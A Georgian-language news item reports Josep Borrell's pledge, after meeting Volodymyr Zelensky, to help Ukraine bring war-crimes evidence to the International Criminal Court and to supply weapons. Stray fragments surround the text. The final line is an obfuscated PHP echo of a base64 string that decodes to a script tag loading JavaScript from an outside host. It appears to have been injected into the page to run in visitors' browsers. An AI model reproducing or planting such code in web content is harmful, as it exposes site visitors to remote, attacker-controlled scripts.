celsiusi
ავერსი შნაიდერი
საგარეო და უსაფრთხოების საკითხებში ევროკავშირის უმაღლესმა წარმომადგენელმა, ჯოზეფ ბორელმა უკრაინის პრეზიდენტ ვოლოდიმირ ზელენსკისთან შეხვედრის შემდეგ განაცხადა, რომ უკრაინას დაეხმარებიან ომის დანაშაულის მტკიცებულებები წარადგინონ სისხლის სამართლის საერთაშორისო სასამართლოში.
 
მისივე თქმით, სულ მცირე, რისი გაკეთებაც უკრაინის დასახმარებლად შეუძლიათ, ეს არის იარაღის მიცემა.
 
„ორი სიტყვაა იმის ასახსნელად, რაც ხდება დღეს უკრაინაში. პირველი არის წარუმატებლობა, რუსული არმიის დიდი წარუმატებლობა, რომელმაც ვერ შეძლო, გადაელახა თქვენი სიმამაცე. მეორე სიტყვაა – საშინელება. მშვიდობიან მოქალაქეებზე თავდასხმის საშინელება, მათი მკვლელობა. ასე რომ, ჩვენ ვიმყოფებით ომის დანაშაულების წინაშე და ჩვენ დავეხმარებით უკრაინელ პროკურორებს, წარადგინონ მტკიცებულებები სისხლის სამართლის საერთაშორისო სასამართლოში. როდესც ვხედავთ, რომ ჩვენთვის იბრძვით, სულ მცირე, რისი გაკეთებაც შეგვიძლია, არის შეიარაღების მოცემა“, – განაცხადა ბორელმა.
661
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");